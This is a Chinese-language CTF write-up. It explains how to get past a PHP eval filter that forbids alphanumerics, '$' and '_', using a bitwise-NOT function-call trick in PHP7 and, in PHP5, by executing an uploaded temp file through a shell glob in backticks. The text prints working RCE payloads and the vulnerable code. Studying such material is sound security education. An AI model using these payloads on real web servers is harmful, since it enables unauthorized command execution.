文章目录
源码
<?php
if(isset($_GET['code'])){
$code = $_GET['code'];
if(strlen($code)>35){
die("Long.");
}
if(preg_match("/[A-Za-z0-9_$]+/",$code)){
die("NO.");
}
eval($code);
}else{
highlight_file(__FILE__);
}
从代码可看出这道题的限制:
- webshell长度不超过35位
- 除了不包含字母数字,还不能包含
$
和_
因为$
不能使用了,所以我们无法构造PHP中的变量。所以,如何解决这个问题?
解决方法
PHP7下的实现
在撰写博客时,描述 PHP 7 新特性的动态函数调用语法可以采用以下方式:
PHP 7 新特性:动态函数调用
PHP 7 引入了许多新特性,其中之一便是对动态函数调用的支持。在 PHP 7 之前,我们无法直接通过变量或表达式来调用函数。但是,PHP 7 打破了这一限制,允许开发者以一种更加灵活和动态的方式执行函数。
动态函数调用语法
在 PHP7 中可以使用以下语法来动态调用函数:
(${expression})();
这里的 ${expression}
可以是任何计算结果为函数名的 PHP 表达式。这意味着你可以在运行时决定要调用哪个函数,从而大大增加了代码的灵活性。
使用 URL 编码动态调用函数
一个有趣的例子是使用 URL 编码来动态指定函数名。例如,如果想动态调用 phpinfo()
函数,但出于某种原因不能直接使用函数名,可以将 phpinfo
转换为 URL 编码形式 %8F%97%8F%96%91%99%90
,然后使用它来调用函数:
(${'%8F%97%8F%96%91%99%90'})(); // 动态调用 phpinfo 函数
在Linux中~为取反
这种方法虽然不常见,但它展示了 PHP 7 在动态调用方面的灵活性。
通过('phpinfo')();
来执行函数
使用(~%8F%97%8F%96%91%99%90)();
得到:
PHP5下的实现
在shell下利用. 来执行任意脚本
利用点命令(.)执行文件
在 Linux 系统中,点命令(.
)是一个强大的工具,它允许执行当前 shell 环境下某个文件中的命令。例如,如果正在使用 bash shell,使用 . file
的方式可以执行 file
文件中的命令,而不需要给予该文件执行权限(x 权限)。
如何获取目标服务器上的文件?
在某些场景下,我们可能需要在目标服务器上执行一个我们可控的文件。一个常见的方法是通过上传功能。许多 web 应用程序允许用户上传文件,这些文件通常会被保存在服务器的临时文件夹中,例如 /tmp
目录。默认情况下,这些临时文件的命名模式可能是 phpXXXXXX
,其中 X
是随机生成的大小写字母。
使用通配符执行临时文件
一旦我们上传了文件,接下来的挑战是如何执行这些以 phpXXXXXX
命名的临时文件。由于文件名的不确定性,我们可以使用 Linux 的 glob 通配符来匹配这些文件:
*
:代表任意数量(包括零个)的任意字符。?
:代表单个任意字符。
因此,我们可以将 /tmp/phpXXXXXX
这样的文件名表示为 /*/??????????
或 /???/??????????
,这样就可以匹配到以 php
开头,后面跟随六个随机字符的临时文件。
但是我们会发现这样(通常情况下)并不能争取的执行文件,而是会报错,原因就是这样匹配到的文件太多了,系统不知道要执行哪个文件。
我们可以使用如下payload:
. /???/????????[@-[]
最后的[@-[]表示ASCII在 @ 和 [ 之间的字符,也就是大写字母,所以最后会执行的文件是tmp文件夹下结尾是大写字母的文件。由于PHP生成的tmp文件最后一位是随机的大小写字母,所以我们可能需要多试几次才能正确的执行我们的代码。
web.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<form action="web.php" method="post" enctype="multipart/form-data">
<input type="file" name="upload_file" id="">
<input type="submit" value="submit">
</form>
</body>
web,php
<?php
if(isset($_GET['code'])){
$code = $_GET['code'];
if(strlen($code)>35){
die("Long.");
}
if(preg_match("/[A-Za-z0-9_$]+/",$code)){
die("NO.");
}
eval($code);
}else{
highlight_file(__FILE__);
}
编写一个脚本并上传
传入payload:
?><?=`.+/%3f%3f%3f/%3f%3f%3f%3f%3f%3f%3f%3f%[%40-[]`%3b
得到结果